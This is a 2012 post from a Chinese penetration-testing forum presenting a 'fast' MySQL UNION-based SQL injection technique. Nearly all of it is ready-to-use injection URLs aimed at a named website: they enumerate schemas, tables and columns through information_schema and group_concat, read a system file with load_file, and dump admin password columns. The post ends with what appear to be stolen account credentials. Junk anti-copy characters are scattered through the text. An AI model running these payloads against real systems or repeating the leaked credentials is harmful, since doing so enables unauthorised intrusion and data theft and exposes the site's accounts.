找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql注入高效方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2262|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似3 Y& a# ~" ]% i4 X  v
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人  _1 y! o+ b$ C! R3 L4 _

0 J7 p, P, v8 H4 f2 m$ j  r; C/ s* ~4 C1 n
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
6 h9 k% [/ d# Z8 v. h. d& X, A% C; H4 i7 j" t
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...& i( k3 }& w: e

% L6 k- n. U/ [下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示9 }6 u, A3 I; @2 O; y2 ^
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
9 g2 r$ G' [( @' g8 m& N
7 X) w8 g+ `& ~$ D7 uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
  |8 `, {( A5 L8 k- @$ l% k4 K
, J% A4 j8 V- L" J, h读出所有库:
' O% I- l; {* ?2 n; `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA/ h, J4 D! ^* P. X. h) i* \, O+ T
' v, A$ `. y" n. P. E

7 h) x. v( p8 D0 X
2 _; |: _! g$ I0 s6 ^! N6 }. d读出所有表:5 s, c7 F/ b9 N, t- \1 p6 u% h
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
$ M9 ~* I/ T" U- L; t# H8 o
4 ~: h" F3 w( f+ x. Y( ?读出所有表字段:7 ], x% u" J+ u- a
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)0 k/ O% l) a8 t/ @; l. @
*/ (97,100,109,105,110)为admin的ascii码 依次类推
8 `( r1 W0 W: f4 M  l! f1 L1 U& B. \
读出所有表字段里的内容:( @3 y6 y! q; Q9 q
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
' W' G# j3 e# G% f# s) s! ~1 i2 v6 G% T% A% ^, h9 E, l3 N

* J# n& @$ [: w  J3 R/ \4 v0 G( @+ k. R3 i+ o- r( U! z

; ^1 v2 T& E7 a5 \0 J: B2 [( q, h; Q) a1 G7 b8 J

' t- b" o5 Q- Ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
  H" N2 u$ V3 u1 ]8 k8 r. X( n- F. H0 n$ B( u# u& t
& N+ R5 c, h5 M/ z
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
5 p2 E, [! w* Q, U4 q
4 x6 u0 P& u$ a: _; |0 U* Qhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%237 h- s/ h/ b  H, X
9 d' a3 S0 F* h2 h$ o* T5 d; b

) F. h2 s  N' D# Vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%236 W% N3 D% d$ u! ^4 G

$ `$ I/ d! H& W$ F$ G! B* S3 K5 k, O7 X
        webmaster:dzb521123,simlab:simadmin20043233& ^7 B1 H5 Q0 s% G& |6 R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表